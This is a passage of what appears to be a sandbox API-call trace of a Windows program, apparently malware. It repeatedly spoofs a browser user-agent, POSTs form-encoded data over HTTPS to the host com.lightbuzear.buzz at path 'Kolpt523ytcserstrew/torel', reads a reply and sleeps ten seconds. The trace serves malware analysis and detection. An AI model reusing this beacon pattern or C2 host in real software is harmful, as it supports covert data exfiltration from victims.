lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0210.936] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0210.937] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0210.937] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0212.108] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a488 | out: hHeap=0x4780000) returned 1 [0212.108] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0212.108] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0212.108] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eca0 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea30 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a3e8 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0212.109] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3e8 | out: hHeap=0x4780000) returned 1 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a3e8 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0212.109] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a370 [0212.110] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0212.110] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0212.110] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0212.110] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0212.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a370 | out: hHeap=0x4780000) returned 1 [0212.111] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0212.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0212.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0212.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0212.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea60 [0212.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0212.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea60 | out: hHeap=0x4780000) returned 1 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0212.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0212.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a398 [0212.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0212.112] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0212.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0212.112] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a370 [0212.112] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0212.112] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0212.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0212.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0212.112] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0212.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0212.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0212.113] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0212.113] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0212.113] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0212.113] FreeLibrary (hLibModule=0x71570000) returned 1 [0212.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0212.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0212.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0212.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a280 | out: hHeap=0x4780000) returned 1 [0212.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0212.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a078 | out: hHeap=0x4780000) returned 1 [0212.115] Sleep (dwMilliseconds=0x2710) [0212.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0212.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0212.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0212.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0212.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0212.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0212.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0212.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0212.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0212.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb80 [0212.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0212.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea60 [0212.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb80 | out: hHeap=0x4780000) returned 1 [0212.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0212.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea60 | out: hHeap=0x4780000) returned 1 [0212.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eb50 [0212.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0212.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0212.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0212.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0212.131] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0212.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0212.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0212.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0212.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0212.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0212.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0212.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0212.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebf8 [0212.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0212.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebf8 | out: hHeap=0x4780000) returned 1 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0212.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a078 [0212.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0212.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a078 | out: hHeap=0x4780000) returned 1 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a078 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0212.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0212.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0212.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0212.133] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0212.133] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0212.133] FreeLibrary (hLibModule=0x71780000) returned 1 [0212.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0212.133] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a280 [0212.134] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0212.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0212.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0212.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0212.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ecd0 [0212.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eca0 [0212.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ecd0 | out: hHeap=0x4780000) returned 1 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0212.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ec70 [0212.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0212.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0212.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0212.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0212.135] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0212.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a3c0 [0212.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0212.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0212.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0212.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0212.136] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0212.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0212.136] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0212.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0212.136] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0212.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0212.136] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0212.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea30 [0212.136] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0212.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0212.136] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0212.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eb80 [0212.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0212.136] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0212.136] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0212.136] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0212.137] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0212.137] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0212.137] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0212.137] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec10 [0212.137] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb98 [0212.137] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec10 | out: hHeap=0x4780000) returned 1 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0212.137] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb98 | out: hHeap=0x4780000) returned 1 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a2a8 [0212.137] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0212.137] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0212.138] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0212.138] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a410 [0212.138] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0212.138] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a438 [0212.138] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0212.138] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0212.139] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0212.139] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0212.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a438 | out: hHeap=0x4780000) returned 1 [0212.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0212.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0212.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0212.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0212.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0212.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0212.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0212.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0212.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0212.140] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eca0 [0212.140] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0212.140] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0212.140] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0212.140] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0212.140] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0212.140] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a2a8 [0212.140] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0212.140] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0212.140] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0212.140] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a438 [0212.140] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0212.140] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0212.140] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0212.141] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0212.141] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0212.141] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0213.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0213.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0213.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0213.306] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea30 [0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814d20 [0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 